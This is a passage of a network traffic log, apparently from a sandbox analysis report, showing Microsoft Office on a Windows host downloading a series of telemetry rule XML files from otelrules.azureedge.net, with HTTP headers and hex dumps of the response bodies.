2024-11-30 11:48:49 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:49 GMT Content-Type: text/xml Content-Length: 1364 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB6AD293" x-ms-request-id: 902f1521-d01e-00a1-2fef-4135b1000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114849Z-174f7845968j6t2phC1EWRcfe800000011dg000000009yhv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:49 UTC	1364	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
113	192.168.2.4	49863	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:48 UTC	192	OUT	GET /rules/rule702801v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:49 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:49 GMT Content-Type: text/xml Content-Length: 1391 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF58DC7E" x-ms-request-id: 6de228a0-301e-0052-2e05-4165d6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114849Z-174f7845968psccphC1EWRuz9s00000011qg000000002phq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:49 UTC	1391	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S

Session ID	Source IP	Source Port	Destination IP	Destination Port
114	192.168.2.4	49864	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:49 UTC	192	OUT	GET /rules/rule702800v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:49 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:49 GMT Content-Type: text/xml Content-Length: 1354 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE0662D7C" x-ms-request-id: 1f887815-401e-0029-26a9-429b43000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114849Z-174f7845968qj8jrhC1EWRh41s00000011ag000000005srm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:49 UTC	1354	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O

Session ID	Source IP	Source Port	Destination IP	Destination Port
115	192.168.2.4	49865	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:49 UTC	192	OUT	GET /rules/rule703351v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:49 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:49 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT ETag: "0x8DC582BDCDD6400" x-ms-request-id: ee9d2ac9-001e-00a2-1991-3fd4d5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114849Z-174f78459688l8rvhC1EWRtzr00000000dwg000000008v75 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:49 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
116	192.168.2.4	49866	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:49 UTC	192	OUT	GET /rules/rule703350v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:49 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:49 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT ETag: "0x8DC582BDF1E2608" x-ms-request-id: 75b435a0-401e-0048-0433-400409000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114849Z-174f78459685726chC1EWRsnbg00000011h00000000019sg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:49 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
117	192.168.2.4	49867	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:51 UTC	192	OUT	GET /rules/rule703501v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:51 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:51 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT ETag: "0x8DC582BE8C605FF" x-ms-request-id: 8a8d0990-701e-0021-2191-3f3d45000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114851Z-174f7845968kdththC1EWRzvxn0000000dsg0000000049y6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:51 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa

Session ID	Source IP	Source Port	Destination IP	Destination Port
118	192.168.2.4	49869	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:51 UTC	192	OUT	GET /rules/rule701801v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:51 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:51 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDC2EEE03" x-ms-request-id: 17f40f6b-801e-00a3-7e91-3f7cfb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114851Z-174f7845968kvnqxhC1EWRmf3g0000000n80000000002p80 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:51 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
119	192.168.2.4	49868	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:51 UTC	192	OUT	GET /rules/rule703500v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:51 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:51 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF497570" x-ms-request-id: 0ad7255b-c01e-00ad-65a2-42a2b9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114851Z-174f7845968swgbqhC1EWRmnb400000011p00000000005n1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:51 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
120	192.168.2.4	49870	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:51 UTC	192	OUT	GET /rules/rule701800v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:51 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:51 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT ETag: "0x8DC582BEA414B16" x-ms-request-id: c1465301-601e-0050-31f1-412c9c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114851Z-174f7845968zgtf6hC1EWRqd8s0000000uag0000000063q0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:51 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
121	192.168.2.4	49871	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:51 UTC	192	OUT	GET /rules/rule701051v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:51 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:51 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT ETag: "0x8DC582BE1CC18CD" x-ms-request-id: 4b94b180-301e-0096-61b2-42e71d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114851Z-174f78459685m244hC1EWRgp2c000000118g000000003ke3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:51 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe

Session ID	Source IP	Source Port	Destination IP	Destination Port
122	192.168.2.4	49872	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:53 UTC	192	OUT	GET /rules/rule701050v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:53 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:53 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB256F43" x-ms-request-id: 5692b7f9-f01e-00aa-21f6-418521000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114853Z-174f7845968pf68xhC1EWRr4h800000011k0000000008k9x x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:53 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.4	49873	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:53 UTC	192	OUT	GET /rules/rule702751v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:53 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:53 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB866CDB" x-ms-request-id: 9875fcdf-d01e-00ad-1c91-3fe942000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114853Z-174f7845968kdththC1EWRzvxn0000000dv0000000000k6h x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:53 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" 